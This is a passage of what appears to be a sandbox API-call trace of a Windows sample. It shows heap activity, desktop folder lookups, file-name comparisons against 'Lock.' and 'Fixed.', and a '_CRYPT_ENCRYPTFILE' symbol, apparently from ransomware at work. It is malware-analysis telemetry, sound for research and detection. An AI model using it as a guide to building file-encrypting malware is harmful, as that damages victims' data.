hHeap=0x970000) returned 1 [0139.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0139.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0139.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4c) returned 0x2e563a8 [0139.479] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/aycVRCc36.ppt", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\aycVRCc36.ppt", lpFilePart=0x8cf650*="aycVRCc36.ppt") returned 0x25 [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0139.479] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aycVRCc36.ppt" (normalized: "c:\\users\\fd1hvy\\desktop\\aycvrcc36.ppt")) returned 0xffffffff [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0139.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0139.643] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0139.645] TranslateMessage (lpMsg=0x8cf968) returned 0 [0139.645] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0139.645] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0139.646] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0139.646] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0139.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0139.646] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0139.646] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0139.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0139.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0139.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0139.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0139.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0139.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0139.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0139.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0139.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0139.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0139.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0139.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0139.646] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cggtx8L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0139.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ggtx8L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0139.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gtx8L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0139.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx8L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0139.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x8L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0139.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0139.647] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0139.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0139.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0139.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0139.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0139.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0139.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0139.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0139.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0139.647] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0139.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0139.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0139.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0139.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0139.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0139.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0139.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0139.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0139.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0139.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cggtx8L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0139.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ggtx8L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0139.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gtx8L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0139.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx8L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0139.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x8L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0139.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8L.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0139.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0139.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0139.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0139.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0139.649] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0139.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0139.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.649] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0139.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0139.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0139.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0139.650] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0139.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0139.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0139.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0139.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0139.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0139.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0139.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0139.650] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0139.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0139.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0139.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0139.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0139.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0139.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0139.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0139.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0139.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53860 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0139.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0139.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0139.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0139.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0139.653] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0139.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0139.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0139.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0139.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0139.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0139.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0139.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0139.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0139.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0139.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0139.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0139.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0139.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0139.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0139.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0139.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0139.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0139.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0139.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0139.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0139.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0139.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0139.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0139.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0139.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0139.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0139.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.655] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0139.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0139.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 